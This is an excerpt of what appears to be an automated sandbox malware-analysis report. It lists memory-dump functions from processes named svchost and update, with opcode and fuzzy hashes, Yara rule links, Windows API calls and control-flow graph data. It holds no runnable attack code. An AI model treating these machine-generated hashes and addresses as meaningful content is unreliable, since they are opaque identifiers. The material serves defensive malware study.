                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5a4ee3c7f7b105cbfa8f68d466ca8bb2b27f22e7e7707e8bb80a9f32b66674ff
                                                    • Instruction ID: a1ce481760afb8785797e51f8473ce289b40f197e9584e154ae3830c46e61e12
                                                    • Opcode Fuzzy Hash: 5a4ee3c7f7b105cbfa8f68d466ca8bb2b27f22e7e7707e8bb80a9f32b66674ff
                                                    • Instruction Fuzzy Hash: 3AF04FB2E102098F8B44EF78EA955EE7BF9EF882107100179D518E7305E73199068BA1
                                                    Function 05231DF5 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3f00b58078538631131e8dbf8ad93d4e4214fdcd9def6def5dcee2b2d59e52f2
                                                    • Instruction ID: 1d89aa695b9fd2a790f26373ab74678108a6837c28d1d7e2ac7d96a13a000a99
                                                    • Opcode Fuzzy Hash: 3f00b58078538631131e8dbf8ad93d4e4214fdcd9def6def5dcee2b2d59e52f2
                                                    • Instruction Fuzzy Hash: 10F03C35951205AFDB06EF68F941A9C7FB9EF01310B404674D0088763DEB359A4ACB92
                                                    Function 05237520 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3f3d49988dcb779bfefd6ddcb65fbc2d4afdc8659060bb541a2ca12817b5585c
                                                    • Instruction ID: e760789e0bbdf21bad64244cb96b39f9687a4354b403de9040d6e4558c01a64f
                                                    • Opcode Fuzzy Hash: 3f3d49988dcb779bfefd6ddcb65fbc2d4afdc8659060bb541a2ca12817b5585c
                                                    • Instruction Fuzzy Hash: A1E0D8B67252951BC7092269142A47F3BD39EC6522B39006BC845DB341CD548D0B43B7
                                                    Function 05237448 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 560f07ba5b1bec559af2c9b0c109e233e1af6540f784f61c68c966a6f929b455
                                                    • Instruction ID: 8ce9358077f09a0b018735d7f9466b58875a7c45a1466263d8333ceaae57dadc
                                                    • Opcode Fuzzy Hash: 560f07ba5b1bec559af2c9b0c109e233e1af6540f784f61c68c966a6f929b455
                                                    • Instruction Fuzzy Hash: D0E0D8723241605BCB0622F464135BC3BAADF875E471104ABC909CB789DD5A8E0343E7
                                                    Function 052374B0 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d512ef4620cd9797bb326fbbf4caf60265fb9d03d46838ccd4bacc301cf2d5d7
                                                    • Instruction ID: 7fa6f7badde5a81db0d5d2e70de2e5e7174ea7370b68895963da0747407b2185
                                                    • Opcode Fuzzy Hash: d512ef4620cd9797bb326fbbf4caf60265fb9d03d46838ccd4bacc301cf2d5d7
                                                    • Instruction Fuzzy Hash: 5EF0587AA00205BFC708EF68E940E497BAAEF44704B2041A4D40887329EB35AD06CF91
                                                    Function 05231E08 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 477ad9962ecc90b754c8990e06b0ead19631b668ce3160be2c1cebe04ebdbd5e
                                                    • Instruction ID: 39849e3bb9891b25fc9e9373e83a8b9e3eaed8d251fc9aae16ad8c668821cc8c
                                                    • Opcode Fuzzy Hash: 477ad9962ecc90b754c8990e06b0ead19631b668ce3160be2c1cebe04ebdbd5e
                                                    • Instruction Fuzzy Hash: 0DF03A35950205AFCB05FFB8E94098C7BB9EF40704B404A74D4088723CEF74AA0BCB91
                                                    Function 05230B0D Relevance: .0, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 814e93fd37d9fc66f3a2341253ca41739b88ee933022061106b5434e6283864d
                                                    • Instruction ID: fe901043e0e2207cbf51473c46e57a94fdd1abfff50d78a20e601382c21de9b6
                                                    • Opcode Fuzzy Hash: 814e93fd37d9fc66f3a2341253ca41739b88ee933022061106b5434e6283864d
                                                    • Instruction Fuzzy Hash: B8E065B052E385DAD75A9324F03E7347E82EF41328F4C40A5C5A65519A8E645549C3F6
                                                    Function 05238099 Relevance: .0, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ba0a7eacb7570532d56365f02b8639a8506fd489cb54b11f1738d84b0d96cc7
                                                    • Instruction ID: 8ecb2b21a4981f3f5a583b37edc7388287002d3ac23867f8c86c4e33333ad214
                                                    • Opcode Fuzzy Hash: 3ba0a7eacb7570532d56365f02b8639a8506fd489cb54b11f1738d84b0d96cc7
                                                    • Instruction Fuzzy Hash: 48F01C35F6020A9BCB04EBB4F06D5AEB772FF84344B108865E80697394DF756C02CB82
                                                    Function 05237530 Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ee96ad538e07672f39876ac3d297da1399e585bf274d669e992b5e8d4209c0dc
                                                    • Instruction ID: b0a0f50ff10fd50f64036678defe22672642230822b5734a12cfeed614476ae8
                                                    • Opcode Fuzzy Hash: ee96ad538e07672f39876ac3d297da1399e585bf274d669e992b5e8d4209c0dc
                                                    • Instruction Fuzzy Hash: BAD05BA6721125178B1C716E501A53F358BDFC5932724103AD906D7344DD50DD0747F5
                                                    Function 05231710 Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7456b265d02d2c7c243251ebb4f4e0709c6bf5f4961e011e57172181eb9e7848
                                                    • Instruction ID: 84972a63ac6269dc705b6d54730af2c31691a272c1b9f4526eee73615a9e0beb
                                                    • Opcode Fuzzy Hash: 7456b265d02d2c7c243251ebb4f4e0709c6bf5f4961e011e57172181eb9e7848
                                                    • Instruction Fuzzy Hash: 64E0C2323001105F83489B3EB88485BBBDFEFC912531544B9F10DC7311CDA0DC024790
                                                    Function 05232ED8 Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f3f557dea987fa07b3d68bf3430e02711fbb3085a45e342ce71c4c6163afd809
                                                    • Instruction ID: 4032d5f5c62975dc8a2a8fe024cff67e24d6371243db5563b55eb13953ba43b9
                                                    • Opcode Fuzzy Hash: f3f557dea987fa07b3d68bf3430e02711fbb3085a45e342ce71c4c6163afd809
                                                    • Instruction Fuzzy Hash: 30E092B1A15349EFCB45DB64999548D7FB4EF1610070144DAD044D7252E7316E15C7A2
                                                    Function 05232EE8 Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00fd986a039bcc30366033a2c2a6c2c2e20439571fca4b9741fc0b7483903ee4
                                                    • Instruction ID: 07438ad80ac2d52a7cdc94cc2e28014579eb7062b6ebaaecaaf6d7f3ea370ae9
                                                    • Opcode Fuzzy Hash: 00fd986a039bcc30366033a2c2a6c2c2e20439571fca4b9741fc0b7483903ee4
                                                    • Instruction Fuzzy Hash: 67D05B7090120DFFCB48DFA4EA4059E7BF9EF44204B1041A9D408D3304EB316F14DB90
                                                    Function 0523E905 Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0ed6fe53c6a1b92185d1eaab96015e90988822c239456de96b25062128e53680
                                                    • Instruction ID: f194bf86ce8cfddcbc3f3c73c5b101f56d75532365fc5cbb0a4069bf09a675b4
                                                    • Opcode Fuzzy Hash: 0ed6fe53c6a1b92185d1eaab96015e90988822c239456de96b25062128e53680
                                                    • Instruction Fuzzy Hash: 5CD0A7327400056BCF08B6BCB8504DC7766DFC12183004439D119CB214EF65D91E4381
                                                    Function 052380CC Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1517b219adecdb3dbf23276ee640e4b3772611c2674375aa4b09195ee9e0711b
                                                    • Instruction ID: 02c7194d3d6115b41e8506cc9c9c57ac778c664e372432c3bf44f66e12351423
                                                    • Opcode Fuzzy Hash: 1517b219adecdb3dbf23276ee640e4b3772611c2674375aa4b09195ee9e0711b
                                                    • Instruction Fuzzy Hash: 64D05231B902588BCB00E6B8E029AAD7B22EB84344B1084A0E9099B384DF795D128B82
                                                    Function 05237BCF Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 263983ec1534f2aaddb9a66b933fa185d345eedb9470e95730a5ecde4a80b942
                                                    • Instruction ID: b5cf4990f39a08687d293eda106807317729b490a5e17adc9e9f4f98156bcef0
                                                    • Opcode Fuzzy Hash: 263983ec1534f2aaddb9a66b933fa185d345eedb9470e95730a5ecde4a80b942
                                                    • Instruction Fuzzy Hash: 70D012315340D19FC705AB28DDE62E17F21FF46394F5840A6C0D58E321E692A493DB85
                                                    Function 052375CE Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2d880b6fb2e43bc2c093a67a94d0802f7be18d2302473c6aece5a35efb3533ff
                                                    • Instruction ID: d9975b542068312fa9607d12e6f1d68e69c6cf0622b0094e59183a03b44475fa
                                                    • Opcode Fuzzy Hash: 2d880b6fb2e43bc2c093a67a94d0802f7be18d2302473c6aece5a35efb3533ff
                                                    • Instruction Fuzzy Hash: 06C01235754146ABD718FB65F9658283714FF8070534404ACDC06C736CEE119851CB56
                                                    Function 05238920 Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07c6102ffe6052278f954ed3baef9aadd439318cc0fe7e459dba2e588dbd0c63
                                                    • Instruction ID: 2c6bedb1e0f485c439e48e32b43c434bd00c8e83c5ca8fe973b593f158d08dc0
                                                    • Opcode Fuzzy Hash: 07c6102ffe6052278f954ed3baef9aadd439318cc0fe7e459dba2e588dbd0c63
                                                    • Instruction Fuzzy Hash: 86C02B738141C007C303B1300D560803B20FA1250034D04D64400C0352FF24A6237200
                                                    Function 05230AB9 Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c41cfb6258cc7038d2b33169b1333ea92fa9041575536aa6a25a51a1ac2b19ee
                                                    • Instruction ID: 9aea0dd430ac8e9115939902bc820b3869f9341bc0ef0378158fb1a520fa0d68
                                                    • Opcode Fuzzy Hash: c41cfb6258cc7038d2b33169b1333ea92fa9041575536aa6a25a51a1ac2b19ee
                                                    • Instruction Fuzzy Hash: B9C012B083A24ACED3289368E03D7283E12EF50300F000036A227102A98EA8048487AB
                                                    Function 05230AD5 Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a0069dc08266ad7bcf722c80f5c7c1f5417184fac538c32328fa223c89f28c7d
                                                    • Instruction ID: ee6a9ef8302f354f70c33b97d7a5cd0cc0cff30e53d8d7de5803af2c3407c05f
                                                    • Opcode Fuzzy Hash: a0069dc08266ad7bcf722c80f5c7c1f5417184fac538c32328fa223c89f28c7d
                                                    • Instruction Fuzzy Hash: 9BC04CB093A246DED32CA7BCF53D7283E12EF50305F041076A667656AD8FA80584D7BB

                                                    Non-executed Functions

                                                    Function 0523F8DA Relevance: 6.5, Strings: 5, Instructions: 220COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0o@p$Dq@p$Lj@p$Lj@p$PH]q
                                                    • API String ID: 0-2942548252
                                                    • Opcode ID: 6b55bc7ea5a0a27884fcf8e40d5dedbc4144f82000a23f8ae98dde4ae327202a
                                                    • Instruction ID: baa1e1f4cc463bf24e30738ddeca5e19a6ac67020a4b82cc3e0c5f1a2d0891a8
                                                    • Opcode Fuzzy Hash: 6b55bc7ea5a0a27884fcf8e40d5dedbc4144f82000a23f8ae98dde4ae327202a
                                                    • Instruction Fuzzy Hash: 8E819D75B202019FCB44DF38D5A8A6D77F2FF88614B1180A9E80ADB365DB78EC46CB51

                                                    Execution Graph

                                                    Execution Coverage:14.7%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:101
                                                    Total number of Limit Nodes:0
                                                    execution_graph 25308 15209c8 25309 15209e3 25308->25309 25314 1527604 25309->25314 25328 1527570 25309->25328 25342 15275ce 25309->25342 25310 1520a35 25316 15275d9 25314->25316 25315 15275ea 25315->25310 25316->25315 25356 1527e50 25316->25356 25361 1527e6d 25316->25361 25366 1527ece 25316->25366 25371 1527f08 25316->25371 25376 1527eeb 25316->25376 25381 1527e8a 25316->25381 25386 1527ea7 25316->25386 25391 1527e20 25316->25391 25396 1527f58 25316->25396 25401 1527f3b 25316->25401 25406 1527e11 25316->25406 25329 152759f 25328->25329 25330 15275ea 25329->25330 25331 1527e50 2 API calls 25329->25331 25332 1527e11 2 API calls 25329->25332 25333 1527f3b 2 API calls 25329->25333 25334 1527f58 2 API calls 25329->25334 25335 1527e20 2 API calls 25329->25335 25336 1527ea7 2 API calls 25329->25336 25337 1527e8a 2 API calls 25329->25337 25338 1527eeb 2 API calls 25329->25338 25339 1527f08 2 API calls 25329->25339 25340 1527ece 2 API calls 25329->25340 25341 1527e6d 2 API calls 25329->25341 25330->25310 25331->25330 25332->25330 25333->25330 25334->25330 25335->25330 25336->25330 25337->25330 25338->25330 25339->25330 25340->25330 25341->25330 25343 15275d9 25342->25343 25344 15275ea 25343->25344 25345 1527e50 2 API calls 25343->25345 25346 1527e11 2 API calls 25343->25346 25347 1527f3b 2 API calls 25343->25347 25348 1527f58 2 API calls 25343->25348 25349 1527e20 2 API calls 25343->25349 25350 1527ea7 2 API calls 25343->25350 25351 1527e8a 2 API calls 25343->25351 25352 1527eeb 2 API calls 25343->25352 25353 1527f08 2 API calls 25343->25353 25354 1527ece 2 API calls 25343->25354 25355 1527e6d 2 API calls 25343->25355 25344->25310 25345->25344 25346->25344 25347->25344 25348->25344 25349->25344 25350->25344 25351->25344 25352->25344 25353->25344 25354->25344 25355->25344 25357 1527e55 25356->25357 25358 1527f73 25357->25358 25411 5de0a6a 25357->25411 25415 5de0a7c 25357->25415 25358->25315 25362 1527e72 25361->25362 25363 1527f73 25362->25363 25364 5de0a7c KiUserExceptionDispatcher 25362->25364 25365 5de0a6a KiUserExceptionDispatcher 25362->25365 25363->25315 25364->25363 25365->25363 25367 1527ed3 25366->25367 25368 1527f73 25367->25368 25369 5de0a7c KiUserExceptionDispatcher 25367->25369 25370 5de0a6a KiUserExceptionDispatcher 25367->25370 25368->25315 25369->25368 25370->25368 25372 1527f0d 25371->25372 25373 1527f73 25372->25373 25374 5de0a7c KiUserExceptionDispatcher 25372->25374 25375 5de0a6a KiUserExceptionDispatcher 25372->25375 25373->25315 25374->25373 25375->25373 25377 1527ef0 25376->25377 25378 5de0a7c KiUserExceptionDispatcher 25377->25378 25379 5de0a6a KiUserExceptionDispatcher 25377->25379 25380 1527f73 25377->25380 25378->25380 25379->25380 25380->25315 25382 1527e8f 25381->25382 25383 1527f73 25382->25383 25384 5de0a7c KiUserExceptionDispatcher 25382->25384 25385 5de0a6a KiUserExceptionDispatcher 25382->25385 25383->25315 25384->25383 25385->25383 25387 1527eac 25386->25387 25388 1527f73 25387->25388 25389 5de0a7c KiUserExceptionDispatcher 25387->25389 25390 5de0a6a KiUserExceptionDispatcher 25387->25390 25388->25315 25389->25388 25390->25388 25392 1527e46 25391->25392 25393 1527f73 25392->25393 25394 5de0a7c KiUserExceptionDispatcher 25392->25394 25395 5de0a6a KiUserExceptionDispatcher 25392->25395 25393->25315 25394->25393 25395->25393 25397 1527f5d 25396->25397 25398 1527f73 25397->25398 25399 5de0a7c KiUserExceptionDispatcher 25397->25399 25400 5de0a6a KiUserExceptionDispatcher 25397->25400 25398->25315 25399->25398 25400->25398 25402 1527f40 25401->25402 25403 1527f73 25402->25403 25404 5de0a7c KiUserExceptionDispatcher 25402->25404 25405 5de0a6a KiUserExceptionDispatcher 25402->25405 25403->25315 25404->25403 25405->25403 25407 1527e46 25406->25407 25408 1527f73 25407->25408 25409 5de0a7c KiUserExceptionDispatcher 25407->25409 25410 5de0a6a KiUserExceptionDispatcher 25407->25410 25408->25315 25409->25408 25410->25408 25412 5de0a7d 25411->25412 25413 5de0a82 KiUserExceptionDispatcher 25412->25413 25414 5de0a95 25412->25414 25413->25412 25414->25358 25416 5de0a7d 25415->25416 25417 5de0a82 KiUserExceptionDispatcher 25416->25417 25418 5de0a95 25416->25418 25417->25416 25418->25358 25419 5de5320 25420 5de5366 KiUserCallbackDispatcher 25419->25420 25422 5de53b9 25420->25422 25423 5de0b20 25424 5de0b42 LdrInitializeThunk 25423->25424 25426 5de0b7c 25424->25426

                                                    Executed Functions

                                                    Function 01525AA8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 700 1525aa8-1525b0e 702 1525b10-1525b1b 700->702 703 1525b58-1525b5a 700->703 702->703 704 1525b1d-1525b29 702->704 705 1525b5c-1525b75 703->705 706 1525b2b-1525b35 704->706 707 1525b4c-1525b56 704->707 712 1525bc1-1525bc3 705->712 713 1525b77-1525b83 705->713 708 1525b37 706->708 709 1525b39-1525b48 706->709 707->705 708->709 709->709 711 1525b4a 709->711 711->707 714 1525bc5-1525c1d 712->714 713->712 715 1525b85-1525b91 713->715 724 1525c67-1525c69 714->724 725 1525c1f-1525c2a 714->725 716 1525b93-1525b9d 715->716 717 1525bb4-1525bbf 715->717 718 1525ba1-1525bb0 716->718 719 1525b9f 716->719 717->714 718->718 721 1525bb2 718->721 719->718 721->717 726 1525c6b-1525c83 724->726 725->724 727 1525c2c-1525c38 725->727 734 1525c85-1525c90 726->734 735 1525ccd-1525ccf 726->735 728 1525c3a-1525c44 727->728 729 1525c5b-1525c65 727->729 731 1525c46 728->731 732 1525c48-1525c57 728->732 729->726 731->732 732->732 733 1525c59 732->733 733->729 734->735 736 1525c92-1525c9e 734->736 737 1525cd1-1525d22 735->737 738 1525ca0-1525caa 736->738 739 1525cc1-1525ccb 736->739 745 1525d28-1525d36 737->745 740 1525cae-1525cbd 738->740 741 1525cac 738->741 739->737 740->740 743 1525cbf 740->743 741->740 743->739 746 1525d38-1525d3e 745->746 747 1525d3f-1525d9f 745->747 746->747 754 1525da1-1525da5 747->754 755 1525daf-1525db3 747->755 754->755 756 1525da7 754->756 757 1525dc3-1525dc7 755->757 758 1525db5-1525db9 755->758 756->755 760 1525dd7-1525ddb 757->760 761 1525dc9-1525dcd 757->761 758->757 759 1525dbb 758->759 759->757 763 1525deb-1525def 760->763 764 1525ddd-1525de1 760->764 761->760 762 1525dcf-1525dd2 call 1520d6c 761->762 762->760 765 1525df1-1525df5 763->765 766 1525dff-1525e03 763->766 764->763 768 1525de3-1525de6 call 1520d6c 764->768 765->766 769 1525df7-1525dfa call 1520d6c 765->769 770 1525e13-1525e17 766->770 771 1525e05-1525e09 766->771 768->763 769->766 775 1525e27 770->775 776 1525e19-1525e1d 770->776 771->770 774 1525e0b 771->774 774->770 778 1525e28 775->778 776->775 777 1525e1f 776->777 777->775 778->778
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \Vl
                                                    • API String ID: 0-682378881
                                                    • Opcode ID: 2621a06b63133d5c0495004995f301f9072d27ffe38b9bfa2d97e7db090567d7
                                                    • Instruction ID: 93899db27d4b7eeca3ca5d7592e4b5f2181cdf088b72b761e4ef5cefe543aaf2
                                                    • Opcode Fuzzy Hash: 2621a06b63133d5c0495004995f301f9072d27ffe38b9bfa2d97e7db090567d7
                                                    • Instruction Fuzzy Hash: DAB16C72E102198FDB14CFA9C8857EDBBF2BF89314F148529D815AB294FB749942CF81
                                                    Function 01526378 Relevance: .3, Instructions: 266COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e1611c9de36bca3c8b20d8f0a83b372c4bc2b27dc64cd891dfe7d44d1f5a118
                                                    • Instruction ID: 48624462ef5e8f960083469f79d22a20b52672a0acb84805ff952a628fa5c33a
                                                    • Opcode Fuzzy Hash: 0e1611c9de36bca3c8b20d8f0a83b372c4bc2b27dc64cd891dfe7d44d1f5a118
                                                    • Instruction Fuzzy Hash: D1B18171E00219CFDF10CFA8D9857ADBBF2BF89314F148529D855AB294EB349845CB81
                                                    Function 05DE5311 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 5de5311-5de5374 3 5de537f-5de53b7 KiUserCallbackDispatcher 0->3 4 5de53b9-5de53bf 3->4 5 5de53c0-5de53e6 3->5 4->5
                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL(00000050), ref: 05DE53A3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4562283030.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_5de0000_update.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherUser
                                                    • String ID: 4']q
                                                    • API String ID: 2492992576-1259897404
                                                    • Opcode ID: 7f68fcb354da52db1cdaa99439dc069a3a60e0cc2f9e11cdb22e6505a69b4f43
                                                    • Instruction ID: a9e792868c44f59e1c46ee11666f5d1fd4d6f029ddb379df7070a0683056e70d
                                                    • Opcode Fuzzy Hash: 7f68fcb354da52db1cdaa99439dc069a3a60e0cc2f9e11cdb22e6505a69b4f43
                                                    • Instruction Fuzzy Hash: 632178B1904289CFDB10DFA9E9047EEBFF4BB08314F10815AD459B3290CB786904CFA1
                                                    Function 05DE5320 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 8 5de5320-5de53b7 KiUserCallbackDispatcher 12 5de53b9-5de53bf 8->12 13 5de53c0-5de53e6 8->13 12->13
                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL(00000050), ref: 05DE53A3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4562283030.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_5de0000_update.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherUser
                                                    • String ID: 4']q
                                                    • API String ID: 2492992576-1259897404
                                                    • Opcode ID: 6be2f329d2c68d522a169dc4e9a9cac1abd051922124850818620ac8fcc372f8
                                                    • Instruction ID: af75f10dcfbb5ac6920c7ee6330354025481074517e20d3dee03ee081e782ec2
